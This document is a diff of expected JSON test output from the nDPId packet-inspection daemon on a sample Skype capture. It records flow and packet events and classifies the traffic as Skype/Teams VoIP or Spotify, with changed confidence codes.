00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":757,"source":"skype.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":757,"source":"skype.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1431969667440,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969667440,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0paYAAEARVdzAqAEib91NjzLdnFYAIE1nnCQCSJLvZtGpgN01LZemo1XXZO+oxg0w"} 
-00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"skype.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"skype.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1431969667440,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431969667440,"pkt":"0NQSxnP1PBXCt3IOCABFAABBc7oAAEARJM\/AqAEiQTffITLdnEsALfH+nCYCgzglH2UUEeAloaKWvjnBLcR69MpntGSFdWneylROBFqJdg=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969667440,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":760,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":1431969667679,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969667679,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhSdN4KmwKgBIpxVw4FWpWbU2Kqh3KASOJCyZwAAAgQFrAQCCApOrGnnPiLsxwEDAwk="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":761,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1431969667679,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969667679,"pkt":"0NQSxnP1PBXCt3IOCABFAAA04YFAAEAGd5rAqAEinTeCpsOBnFXYqqHcVqVm1YAQECwIogAAAQEICj4i7bdOrGnn"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":776,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969668393,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":776,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1431969668393,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969668393,"pkt":"0NQSxnP1PBXCt3IOCABFAABAuzMAAEARQDfAqAEib91NmzLdnEQALFAWnCgCEvePRGLJGr6Sre+ODORDkQCce9O5GJ9D557YPiPEFuAx"} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":776,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969668393,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":776,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969668393,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":777,"source":"skype.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969668393,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.143","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":777,"source":"skype.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1431969668393,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969668393,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/2XIAAEARv6rAqAEinTeCjzLdnFEAK32DnCoCUchv5aDS7Qgi\/2x8dTOyi7BA\/ZCxsEvRrtCtnVEnyoU="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":777,"source":"skype.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969668393,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.143","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":777,"source":"skype.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969668393,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.143","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":783,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668503,"flow_last_seen":1431969668503,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1431969668503,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1431969668503,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1431969668503,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAABItzYAAEARPsPAqAFcwKgB\/+EV4RUANFGUU3BvdFVkcDB5FYpWEIvHwwABAARIlcIDhMAbG8d8ZX7RWey9o+VAQ2IEJyw="} 
-00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668503,"flow_last_seen":1431969668503,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1431969668503,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969668503,"flow_last_seen":1431969668503,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1431969668503,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":794,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669039,"flow_last_seen":1431969669039,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969669039,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":794,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1431969669039,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969669039,"pkt":"0NQSxnP1PBXCt3IOCABFAABAm5lAAEAGvXbAqAEinTeCpsODAbsS3IR+AAAAALAC\/\/\/HlQAAAgQFtAEDAwUBAQgKPiLzAwAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":2,"flow_last_seen":1431969669172,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969669172,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhSdN4KmwKgBIgG7w4O9Vc6mEtyEf6ASOJBZ3QAAAgQFrAQCCApOrGt3PiLzAwEDAwk="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"skype.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":3,"flow_last_seen":1431969669172,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969669172,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0jk9AAEAGyszAqAEinTeCpsODAbsS3IR\/vVXOp4AQECywggAAAQEICj4i84hOrGt3"} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":803,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1431969669408,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969669408,"pkt":"0NQSxnP1PBXCt3IOCABFAAA749YAAEARS6HAqAEi1cezqDLdnEYAJ90VnCwCpNRKktf4Qi\/bdq+yPcZvRHBM0A5YqXcB1iPXfA=="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":803,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":803,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":804,"source":"skype.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":804,"source":"skype.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1431969669408,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969669408,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5xgUAAEARIZrAqAEinTg0EjLdgQkAJZdLnC4CEFtjW45ZN3BY7kxO5IarNwXkC3qnvdRTMpg="} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":804,"source":"skype.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":804,"source":"skype.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":805,"source":"skype.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":805,"source":"skype.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1431969669408,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431969669408,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9eQsAAEARtnjAqAEi1cezmjLdnGIAKUaUnDACIJVxUOV7zs6xYvMq6EYi6E1yxVZ+ttOndiNbBj7C"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":805,"source":"skype.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40034,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":805,"source":"skype.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969669408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40034,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":815,"source":"skype.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969670418,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":815,"source":"skype.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1431969670418,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969670418,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1a3EAAEARxCLAqAEi1cezkjLdnF4AIe2\/nDICH70PgbauE\/TDe2jJ8Wqi40Tw\/dlcGg=="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":815,"source":"skype.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969670418,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":815,"source":"skype.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969670418,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":816,"source":"skype.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969670418,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.32","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":816,"source":"skype.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1431969670418,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969670418,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4XYMAAEARoWrAqAEib91KIDLdnEkAJPvTnDQCE7A5vpizco713fAfzrDXfyhKHUClX6xRMw=="} 
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":816,"source":"skype.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969670418,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.32","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 